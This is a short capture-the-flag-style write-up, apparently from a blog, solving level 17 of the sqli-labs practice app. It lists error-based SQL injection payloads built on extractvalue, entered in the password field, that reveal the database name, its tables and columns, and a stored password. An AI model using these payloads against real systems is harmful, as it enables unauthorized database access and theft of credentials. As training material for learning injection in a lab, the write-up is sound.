[Network security] sqli-labs Less-17 problem-solving analysis

Investigate error injection

This article uses extractvalue for injection

For the principle and posture, please refer to [Network Security] sqli-labs Less-5 Detailed Analysis of Problem Solving

Determine the type of injection

As can be seen from the following echo, the injection type is single quote injection

---

Check library name

Account input admin
password input:

1' and (extractvalue(1,concat(0x5c,database(),0x5c)))# 

The library name is security

---

Lookup table name

Account input admin
password input:

1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))# 

echo four tables

---

Check column name

Account input admin
password input:

1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))# 

get three columns

---

check data

Account input admin
password input:

1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))#  

---

Summarize

The above is a detailed analysis of [Network Security] sqli-labs Less-17 problem solving, and we will share the detailed analysis of [Network Security] sqli-labs Less-18 problem solving later.

I am Qiu said , see you next time.